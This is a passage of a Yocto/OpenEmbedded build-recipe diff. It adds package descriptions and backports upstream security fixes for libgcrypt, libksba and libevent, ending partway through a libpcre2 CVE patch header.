2SECTION = "libs" 6SECTION = "libs"
3AUTHOR = "Lennart Poettering <lennart@poettering.net>" 7AUTHOR = "Lennart Poettering <lennart@poettering.net>"
4HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/" 8HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/"
diff --git a/meta/recipes-support/libevdev/libevdev/determinism.patch b/meta/recipes-support/libevdev/libevdev/determinism.patch
index 33a6076b78..06128a8e7e 100644
--- a/meta/recipes-support/libevdev/libevdev/determinism.patch
+++ b/meta/recipes-support/libevdev/libevdev/determinism.patch
@@ -4,7 +4,8 @@ Sort to remove this inconsistency.
4RP 2020/2/7 4RP 2020/2/7
5 5
6Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> 6Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
7Upstream-Status: Pending 7Submitted: https://lists.freedesktop.org/archives/input-tools/2021-February/001560.html
8Upstream-Status: Backport [https://gitlab.freedesktop.org/libevdev/libevdev/-/commit/8d70f449892c6f7659e07bb0f06b8347677bb7d8]
8 9
9Index: a/libevdev/make-event-names.py 10Index: a/libevdev/make-event-names.py
10=================================================================== 11===================================================================
diff --git a/meta/recipes-support/libevdev/libevdev_1.8.0.bb b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
index 3523dc0968..fd7dd15c26 100644
--- a/meta/recipes-support/libevdev/libevdev_1.8.0.bb
+++ b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Wrapper library for evdev devices" 1SUMMARY = "Wrapper library for evdev devices"
2DESCRIPTION = "A library for handling evdev kernel devices. It abstracts \
3the evdev ioctls through type-safe interfaces and provides functions \
4to change the appearance of the device."
2HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/" 5HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/"
3SECTION = "libs" 6SECTION = "libs"
4 7
diff --git a/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
new file mode 100644
index 0000000000..0b20eda3c0
--- /dev/null
+++ b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
@@ -0,0 +1,33 @@
1From dff8fd27edb23bc1486809186c6a4fe1f75f2179 Mon Sep 17 00:00:00 2001
2From: Yi Fan Yu <yifan.yu@windriver.com>
3Date: Thu, 22 Apr 2021 22:35:59 -0400
4Subject: [PATCH] test/regress.h: Increase default timeval tolerance 50 ms ->
5 100 ms
6
7The default timeout tolerance is 50 ms,
8which causes intermittent failure in many the
9related tests in arm64 QEMU.
10
11See: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14163
12(The root cause seems to be a heavy load)
13
14Upstream-Status: Submitted [https://github.com/libevent/libevent/pull/1157]
15
16Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
17---
18 test/regress.h | 2 +-
19 1 file changed, 1 insertion(+), 1 deletion(-)
20
21diff --git a/test/regress.h b/test/regress.h
22index f06a7669..829af4a7 100644
23--- a/test/regress.h
24+++ b/test/regress.h
25@@ -127,7 +127,7 @@ int test_ai_eq_(const struct evutil_addrinfo *ai, const char *sockaddr_port,
26 tt_int_op(labs(timeval_msec_diff((tv1), (tv2)) - diff), <=, tolerance)
27
28 #define test_timeval_diff_eq(tv1, tv2, diff) \
29- test_timeval_diff_leq((tv1), (tv2), (diff), 50)
30+ test_timeval_diff_leq((tv1), (tv2), (diff), 100)
31
32 long timeval_msec_diff(const struct timeval *start, const struct timeval *end);
33
diff --git a/meta/recipes-support/libevent/libevent_2.1.11.bb b/meta/recipes-support/libevent/libevent_2.1.11.bb
index fb186eb89f..75f9979c5b 100644
--- a/meta/recipes-support/libevent/libevent_2.1.11.bb
+++ b/meta/recipes-support/libevent/libevent_2.1.11.bb
@@ -1,4 +1,9 @@
1SUMMARY = "An asynchronous event notification library" 1SUMMARY = "An asynchronous event notification library"
2DESCRIPTION = "A software library that provides asynchronous event \
3notification. The libevent API provides a mechanism to execute a callback \
4function when a specific event occurs on a file descriptor or after a \
5timeout has been reached. libevent also supports callbacks triggered \
6by signals and regular timeouts"
2HOMEPAGE = "http://libevent.org/" 7HOMEPAGE = "http://libevent.org/"
3BUGTRACKER = "https://github.com/libevent/libevent/issues" 8BUGTRACKER = "https://github.com/libevent/libevent/issues"
4SECTION = "libs" 9SECTION = "libs"
@@ -10,6 +15,7 @@ SRC_URI = "https://github.com/libevent/libevent/releases/download/release-${PV}-
10 file://Makefile-missing-test-dir.patch \ 15 file://Makefile-missing-test-dir.patch \
11 file://run-ptest \ 16 file://run-ptest \
12 file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \ 17 file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \
18 file://0002-test-regress.h-Increase-default-timeval-tolerance-50.patch \
13 " 19 "
14 20
15SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531" 21SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531"
diff --git a/meta/recipes-support/libexif/libexif_0.6.22.bb b/meta/recipes-support/libexif/libexif_0.6.22.bb
index 3b08dc52be..86d4464253 100644
--- a/meta/recipes-support/libexif/libexif_0.6.22.bb
+++ b/meta/recipes-support/libexif/libexif_0.6.22.bb
@@ -1,4 +1,7 @@
1SUMMARY = "Library for reading extended image information (EXIF) from JPEG files" 1SUMMARY = "Library for reading extended image information (EXIF) from JPEG files"
2DESCRIPTION = "libexif is a library for parsing, editing, and saving EXIF data. It is \
3intended to replace lots of redundant implementations in command-line \
4utilities and programs with GUIs."
2HOMEPAGE = "https://libexif.github.io/" 5HOMEPAGE = "https://libexif.github.io/"
3SECTION = "libs" 6SECTION = "libs"
4LICENSE = "LGPLv2.1" 7LICENSE = "LGPLv2.1"
diff --git a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
index 85102a1a3d..8971486715 100644
--- a/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm-extra_1.3.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Library for file management" 1SUMMARY = "Library for file management"
2DESCRIPTION = "Contains a library and other files required by menu-cache-gen libexec of menu-cache-1.1.0. "
2HOMEPAGE = "http://pcmanfm.sourceforge.net/" 3HOMEPAGE = "http://pcmanfm.sourceforge.net/"
3 4
4LICENSE = "LGPLv2+" 5LICENSE = "LGPLv2+"
diff --git a/meta/recipes-support/libfm/libfm_1.3.1.bb b/meta/recipes-support/libfm/libfm_1.3.1.bb
index 63ae7874b9..b6f9df0c55 100644
--- a/meta/recipes-support/libfm/libfm_1.3.1.bb
+++ b/meta/recipes-support/libfm/libfm_1.3.1.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Library for file management" 1SUMMARY = "Library for file management"
2DESCRIPTION = "LibFM provides file management functions built on top of Glib/GIO \
3giving a convenient higher-level API."
2HOMEPAGE = "http://pcmanfm.sourceforge.net/" 4HOMEPAGE = "http://pcmanfm.sourceforge.net/"
3 5
4LICENSE = "GPLv2+ & LGPLv2+" 6LICENSE = "GPLv2+ & LGPLv2+"
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
new file mode 100644
index 0000000000..bf26486d8b
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch
@@ -0,0 +1,77 @@
1From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001
2From: NIIBE Yutaka <gniibe@fsij.org>
3Date: Tue, 13 Apr 2021 10:00:00 +0900
4Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding
5 too.
6
7* cipher/elgamal.c (do_encrypt): Also do exponent blinding.
8
9--
10
11Base blinding had been introduced with USE_BLINDING. This patch add
12exponent blinding as well to mitigate side-channel attack on mpi_powm.
13
14GnuPG-bug-id: 5328
15Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
16
17Upstream-Status: Backport
18CVE: CVE-2021-33560
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 cipher/elgamal.c | 20 +++++++++++++++++---
22 1 file changed, 17 insertions(+), 3 deletions(-)
23
24diff --git a/cipher/elgamal.c b/cipher/elgamal.c
25index 4eb52d62..9835122f 100644
26--- a/cipher/elgamal.c
27+++ b/cipher/elgamal.c
28@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
29 static void
30 decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
31 {
32- gcry_mpi_t t1, t2, r;
33+ gcry_mpi_t t1, t2, r, r1, h;
34 unsigned int nbits = mpi_get_nbits (skey->p);
35+ gcry_mpi_t x_blind;
36
37 mpi_normalize (a);
38 mpi_normalize (b);
39@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey )
40
41 t2 = mpi_snew (nbits);
42 r = mpi_new (nbits);
43+ r1 = mpi_new (nbits);
44+ h = mpi_new (nbits);
45+ x_blind = mpi_snew (nbits);
46
47 /* We need a random number of about the prime size. The random
48 number merely needs to be unpredictable; thus we use level 0. */
49 _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM);
50
51+ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */
52+ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM);
53+ mpi_set_highbit (r1, nbits - 1);
54+ mpi_sub_ui (h, skey->p, 1);
55+ mpi_mul (x_blind, h, r1);
56+ mpi_add (x_blind, skey->x, x_blind);
57+
58 /* t1 = r^x mod p */
59- mpi_powm (t1, r, skey->x, skey->p);
60+ mpi_powm (t1, r, x_blind, skey->p);
61 /* t2 = (a * r)^-x mod p */
62 mpi_mulm (t2, a, r, skey->p);
63- mpi_powm (t2, t2, skey->x, skey->p);
64+ mpi_powm (t2, t2, x_blind, skey->p);
65 mpi_invm (t2, t2, skey->p);
66 /* t1 = (t1 * t2) mod p*/
67 mpi_mulm (t1, t1, t2, skey->p);
68
69+ mpi_free (x_blind);
70+ mpi_free (h);
71+ mpi_free (r1);
72 mpi_free (r);
73 mpi_free (t2);
74
75--
762.11.0
77
diff --git a/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
new file mode 100644
index 0000000000..b3a18bc5aa
--- /dev/null
+++ b/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch
@@ -0,0 +1,109 @@
1From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001
2From: NIIBE Yutaka <gniibe@fsij.org>
3Date: Fri, 21 May 2021 11:15:07 +0900
4Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations.
5
6* cipher/elgamal.c (gen_k): Remove support of smaller K.
7(do_encrypt): Never use smaller K.
8(sign): Folllow the change of gen_k.
9
10--
11
12Cherry-pick master commit of:
13 632d80ef30e13de6926d503aa697f92b5dbfbc5e
14
15This change basically reverts encryption changes in two commits:
16
17 74386120dad6b3da62db37f7044267c8ef34689b
18 78531373a342aeb847950f404343a05e36022065
19
20Use of smaller K for ephemeral key in ElGamal encryption is only good,
21when we can guarantee that recipient's key is generated by our
22implementation (or compatible).
23
24For detail, please see:
25
26 Luca De Feo, Bertram Poettering, Alessandro Sorniotti,
27 "On the (in)security of ElGamal in OpenPGP";
28 in the proceedings of CCS'2021.
29
30CVE-id: CVE-2021-33560
31GnuPG-bug-id: 5328
32Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti
33Signed-off-by: NIIBE Yutaka <gniibe@fsij.org>
34
35Upstream-Status: Backport
36CVE: CVE-2021-40528
37Signed-off-by: Armin Kuster <akuster@mvista.com>
38---
39 cipher/elgamal.c | 24 ++++++------------------
40 1 file changed, 6 insertions(+), 18 deletions(-)
41
42diff --git a/cipher/elgamal.c b/cipher/elgamal.c
43index 4eb52d62..ae7a631e 100644
44--- a/cipher/elgamal.c
45+++ b/cipher/elgamal.c
46@@ -66,7 +66,7 @@ static const char *elg_names[] =
47
48
49 static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie);
50-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k);
51+static gcry_mpi_t gen_k (gcry_mpi_t p);
52 static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits,
53 gcry_mpi_t **factors);
54 static int check_secret_key (ELG_secret_key *sk);
55@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie )
56
57 /****************
58 * Generate a random secret exponent k from prime p, so that k is
59- * relatively prime to p-1. With SMALL_K set, k will be selected for
60- * better encryption performance - this must never be used signing!
61+ * relatively prime to p-1.
62 */
63 static gcry_mpi_t
64-gen_k( gcry_mpi_t p, int small_k )
65+gen_k( gcry_mpi_t p )
66 {
67 gcry_mpi_t k = mpi_alloc_secure( 0 );
68 gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) );
69@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k )
70 unsigned int nbits, nbytes;
71 char *rndbuf = NULL;
72
73- if (small_k)
74- {
75- /* Using a k much lesser than p is sufficient for encryption and
76- * it greatly improves the encryption performance. We use
77- * Wiener's table and add a large safety margin. */
78- nbits = wiener_map( orig_nbits ) * 3 / 2;
79- if( nbits >= orig_nbits )
80- BUG();
81- }
82- else
83- nbits = orig_nbits;
84-
85+ nbits = orig_nbits;
86
87 nbytes = (nbits+7)/8;
88 if( DBG_CIPHER )
89@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey )
90 * error code.
91 */
92
93- k = gen_k( pkey->p, 1 );
94+ k = gen_k( pkey->p );
95 mpi_powm (a, pkey->g, k, pkey->p);
96
97 /* b = (y^k * input) mod p
98@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey )
99 *
100 */
101 mpi_sub_ui(p_1, p_1, 1);
102- k = gen_k( skey->p, 0 /* no small K ! */ );
103+ k = gen_k( skey->p );
104 mpi_powm( a, skey->g, k, skey->p );
105 mpi_mul(t, skey->x, a );
106 mpi_subm(t, input, t, p_1 );
107--
1082.30.2
109
diff --git a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
index 9fd3b7c8c9..8045bab9ed 100644
--- a/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
+++ b/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb
@@ -1,4 +1,7 @@
1SUMMARY = "General purpose cryptographic library based on the code from GnuPG" 1SUMMARY = "General purpose cryptographic library based on the code from GnuPG"
2DESCRIPTION = "A cryptography library developed as a separated module of GnuPG. \
3It can also be used independently of GnuPG, but depends on its error-reporting \
4library Libgpg-error."
2HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/" 5HOMEPAGE = "http://directory.fsf.org/project/libgcrypt/"
3BUGTRACKER = "https://bugs.g10code.com/gnupg/index" 6BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
4SECTION = "libs" 7SECTION = "libs"
@@ -25,6 +28,8 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \
25 file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \ 28 file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \
26 file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \ 29 file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \
27 file://determinism.patch \ 30 file://determinism.patch \
31 file://CVE-2021-33560.patch \
32 file://CVE-2021-40528.patch \
28" 33"
29SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743" 34SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743"
30SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3" 35SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3"
diff --git a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
index b9a2b01c20..7b7404b516 100644
--- a/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
+++ b/meta/recipes-support/libgpg-error/libgpg-error_1.37.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Small library that defines common error values for all GnuPG components" 1SUMMARY = "Small library that defines common error values for all GnuPG components"
2DESCRIPTION = "Contains common error codes and error handling functions used by GnuPG, Libgcrypt, GPGME and more packages. "
2HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/" 3HOMEPAGE = "http://www.gnupg.org/related_software/libgpg-error/"
3BUGTRACKER = "https://bugs.g10code.com/gnupg/index" 4BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
4 5
diff --git a/meta/recipes-support/libical/libical_3.0.7.bb b/meta/recipes-support/libical/libical_3.0.7.bb
index a50473e9ec..170f12b7a9 100644
--- a/meta/recipes-support/libical/libical_3.0.7.bb
+++ b/meta/recipes-support/libical/libical_3.0.7.bb
@@ -1,4 +1,8 @@
1SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library" 1SUMMARY = "iCal and scheduling (RFC 2445, 2446, 2447) library"
2DESCRIPTION = "An Open Source implementation of the iCalendar protocols \
3and protocol data units. The iCalendar specification describes how \
4calendar clients can communicate with calendar servers so users can store \
5their calendar data and arrange meetings with other users. "
2HOMEPAGE = "https://github.com/libical/libical" 6HOMEPAGE = "https://github.com/libical/libical"
3BUGTRACKER = "https://github.com/libical/libical/issues" 7BUGTRACKER = "https://github.com/libical/libical/issues"
4LICENSE = "LGPLv2.1 | MPL-2.0" 8LICENSE = "LGPLv2.1 | MPL-2.0"
diff --git a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
index 710ef0172d..841edc6829 100644
--- a/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
+++ b/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \
9 file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \ 9 file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \
10 file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \ 10 file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \
11 " 11 "
12SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \ 12SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \
13 file://0001-Makefile-cleanup-install-for-rebuilds.patch \ 13 file://0001-Makefile-cleanup-install-for-rebuilds.patch \
14 file://0001-Make-man-pages-reproducible.patch" 14 file://0001-Make-man-pages-reproducible.patch"
15SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba" 15SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba"
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
new file mode 100644
index 0000000000..ff9f2f9275
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
@@ -0,0 +1,47 @@
1From 4b7d9cd4a018898d7714ce06f3faf2626c14582b Mon Sep 17 00:00:00 2001
2From: Werner Koch <wk@gnupg.org>
3Date: Wed, 5 Oct 2022 14:19:06 +0200
4Subject: [PATCH] Detect a possible overflow directly in the TLV parser.
5
6* src/ber-help.c (_ksba_ber_read_tl): Check for overflow of a commonly
7used sum.
8--
9
10It is quite common to have checks like
11
12 if (ti.nhdr + ti.length >= DIM(tmpbuf))
13 return gpg_error (GPG_ERR_TOO_LARGE);
14
15This patch detects possible integer overflows immmediately when
16creating the TI object.
17
18Reported-by: ZDI-CAN-18927, ZDI-CAN-18928, ZDI-CAN-18929
19
20
21Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=patch;h=4b7d9cd4a018898d7714ce06f3faf2626c14582b]
22CVE: CVE-2022-3515
23Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
24---
25 src/ber-help.c | 6 ++++++
26 1 file changed, 6 insertions(+)
27
28diff --git a/src/ber-help.c b/src/ber-help.c
29index 81c31ed..56efb6a 100644
30--- a/src/ber-help.c
31+++ b/src/ber-help.c
32@@ -182,6 +182,12 @@ _ksba_ber_read_tl (ksba_reader_t reader, struct tag_info *ti)
33 ti->length = len;
34 }
35
36+ if (ti->length > ti->nhdr && (ti->nhdr + ti->length) < ti->length)
37+ {
38+ ti->err_string = "header+length would overflow";
39+ return gpg_error (GPG_ERR_EOVERFLOW);
40+ }
41+
42 /* Without this kludge some example certs can't be parsed */
43 if (ti->class == CLASS_UNIVERSAL && !ti->tag)
44 ti->length = 0;
45--
462.11.0
47
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
new file mode 100644
index 0000000000..b09d0eb557
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
@@ -0,0 +1,69 @@
1From b17444b3c47e32c77a3ba5335ae30ccbadcba3cf Mon Sep 17 00:00:00 2001
2From: Werner Koch <wk@gnupg.org>
3Date: Tue, 22 Nov 2022 16:36:46 +0100
4Subject: [PATCH] Fix an integer overflow in the CRL signature parser.
5
6* src/crl.c (parse_signature): N+N2 now checked for overflow.
7
8* src/ocsp.c (parse_response_extensions): Do not accept too large
9values.
10(parse_single_extensions): Ditto.
11--
12
13The second patch is an extra safegourd not related to the reported
14bug.
15
16GnuPG-bug-id: 6284
17Reported-by: Joseph Surin, elttam
18CVE: CVE-2022-47629
19https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=commit;h=f61a5ea4e0f6a80fd4b28ef0174bee77793cf070
20Upstream-Status: Backport
21Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
22---
23 src/crl.c | 2 +-
24 src/ocsp.c | 12 ++++++++++++
25 2 files changed, 13 insertions(+), 1 deletion(-)
26
27diff --git a/src/crl.c b/src/crl.c
28index 87a3fa3..9d3028e 100644
29--- a/src/crl.c
30+++ b/src/crl.c
31@@ -1434,7 +1434,7 @@ parse_signature (ksba_crl_t crl)
32 && !ti.is_constructed) )
33 return gpg_error (GPG_ERR_INV_CRL_OBJ);
34 n2 = ti.nhdr + ti.length;
35- if (n + n2 >= DIM(tmpbuf))
36+ if (n + n2 >= DIM(tmpbuf) || (n + n2) < n)
37 return gpg_error (GPG_ERR_TOO_LARGE);
38 memcpy (tmpbuf+n, ti.buf, ti.nhdr);
39 err = read_buffer (crl->reader, tmpbuf+n+ti.nhdr, ti.length);
40diff --git a/src/ocsp.c b/src/ocsp.c
41index 4b26f8d..c41234e 100644
42--- a/src/ocsp.c
43+++ b/src/ocsp.c
44@@ -912,6 +912,12 @@ parse_response_extensions (ksba_ocsp_t ocsp,
45 else
46 ocsp->good_nonce = 1;
47 }
48+ if (ti.length > (1<<24))
49+ {
50+ /* Bail out on much too large objects. */
51+ err = gpg_error (GPG_ERR_BAD_BER);
52+ goto leave;
53+ }
54 ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
55 if (!ex)
56 {
57@@ -979,6 +985,12 @@ parse_single_extensions (struct ocsp_reqitem_s *ri,
58 err = parse_octet_string (&data, &datalen, &ti);
59 if (err)
60 goto leave;
61+ if (ti.length > (1<<24))
62+ {
63+ /* Bail out on much too large objects. */
64+ err = gpg_error (GPG_ERR_BAD_BER);
65+ goto leave;
66+ }
67 ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
68 if (!ex)
69 {
diff --git a/meta/recipes-support/libksba/libksba_1.3.5.bb b/meta/recipes-support/libksba/libksba_1.3.5.bb
index 336d7f8177..5293aa91e1 100644
--- a/meta/recipes-support/libksba/libksba_1.3.5.bb
+++ b/meta/recipes-support/libksba/libksba_1.3.5.bb
@@ -1,4 +1,9 @@
1SUMMARY = "Easy API to create and parse X.509 and CMS related objects" 1SUMMARY = "Easy API to create and parse X.509 and CMS related objects"
2DESCRIPTION = "A library to make the tasks of working with X.509 certificates, \
3CMS data and related objects more easy. It provides a highlevel interface to \
4the implemented protocols and presents the data in a consistent way. The \
5library does not rely on another cryptographic library but provides \
6hooks for easy integration with Libgcrypt. "
2HOMEPAGE = "http://www.gnupg.org/related_software/libksba/" 7HOMEPAGE = "http://www.gnupg.org/related_software/libksba/"
3LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)" 8LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)"
4LICENSE_${PN} = "GPLv2+ | LGPLv3+" 9LICENSE_${PN} = "GPLv2+ | LGPLv3+"
@@ -17,7 +22,10 @@ inherit autotools binconfig-disabled pkgconfig texinfo
17 22
18UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html" 23UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html"
19SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \ 24SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
20 file://ksba-add-pkgconfig-support.patch" 25 file://ksba-add-pkgconfig-support.patch \
26 file://CVE-2022-47629.patch \
27 file://CVE-2022-3515.patch \
28"
21 29
22SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2" 30SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2"
23SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340" 31SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340"
diff --git a/meta/recipes-support/libnl/libnl_3.5.0.bb b/meta/recipes-support/libnl/libnl_3.5.0.bb
index 9d0e1441a9..f4b5d40bb2 100644
--- a/meta/recipes-support/libnl/libnl_3.5.0.bb
+++ b/meta/recipes-support/libnl/libnl_3.5.0.bb
@@ -1,4 +1,9 @@
1SUMMARY = "A library for applications dealing with netlink sockets" 1SUMMARY = "A library for applications dealing with netlink sockets"
2DESCRIPTION = "The libnl suite is a collection of libraries providing \
3APIs to netlink protocol based Linux kernel interfaces. libnl is the core \
4library implementing the fundamentals required to use the netlink protocol \
5such as socket handling, message construction and parsing, and sending \
6and receiving of data."
2HOMEPAGE = "http://www.infradead.org/~tgr/libnl/" 7HOMEPAGE = "http://www.infradead.org/~tgr/libnl/"
3SECTION = "libs/network" 8SECTION = "libs/network"
4 9
diff --git a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch b/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
deleted file mode 100644
index 89b44f6aa6..0000000000
--- a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
+++ /dev/null
@@ -1,41 +0,0 @@
1Upstream-Status: Inappropriate [debian patch]
2
3This patch address a namespace collision with libc.
4
5Although there is no "#include <regex.h>" in the source file, at
6runtime, it's unintentionally linked to the libc version, the regcomp of
7libc is called instead the pcre one using pcre's data structure...
8that looks like a disaster.
9
10Can patch is from Debian (and Ubuntu 11.04alpha has it also).
11
12[sgw: added patch comment]
13Signed-off-by: Qing He <qing.he@intel.com>
14Signed-off-by: Saul Wold <sgw@linux.intel.com>
15
16--- a/pcreposix.h 2010-05-17 00:17:23.000000000 +0800
17+++ b/pcreposix.h 2009-01-15 04:32:17.000000000 +0800
18@@ -133,14 +130,19 @@
19
20 /* The functions */
21
22-PCREPOSIX_EXP_DECL int regcomp(regex_t *, const char *, int);
23-PCREPOSIX_EXP_DECL int regexec(const regex_t *, const char *, size_t,
24+PCREPOSIX_EXP_DECL int pcreposix_regcomp(regex_t *, const char *, int);
25+PCREPOSIX_EXP_DECL int pcreposix_regexec(const regex_t *, const char *, size_t,
26 regmatch_t *, int);
27-PCREPOSIX_EXP_DECL size_t regerror(int, const regex_t *, char *, size_t);
28-PCREPOSIX_EXP_DECL void regfree(regex_t *);
29+PCREPOSIX_EXP_DECL size_t pcreposix_regerror(int, const regex_t *, char *, size_t);
30+PCREPOSIX_EXP_DECL void pcreposix_regfree(regex_t *);
31
32 #ifdef __cplusplus
33 } /* extern "C" */
34 #endif
35
36+#define regcomp pcreposix_regcomp
37+#define regexec pcreposix_regexec
38+#define regerror pcreposix_regerror
39+#define regfree pcreposix_regfree
40+
41 #endif /* End of pcreposix.h */
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
new file mode 100644
index 0000000000..42ee417fe7
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
@@ -0,0 +1,30 @@
1From 5d1e62b0155292b994aa1c96d4ed8ce4346ef4c2 Mon Sep 17 00:00:00 2001
2From: Zoltan Herczeg <hzmester@freemail.hu>
3Date: Thu, 24 Mar 2022 05:34:42 +0000
4Subject: [PATCH] Fix incorrect value reading in JIT.
5
6CVE: CVE-2022-1586
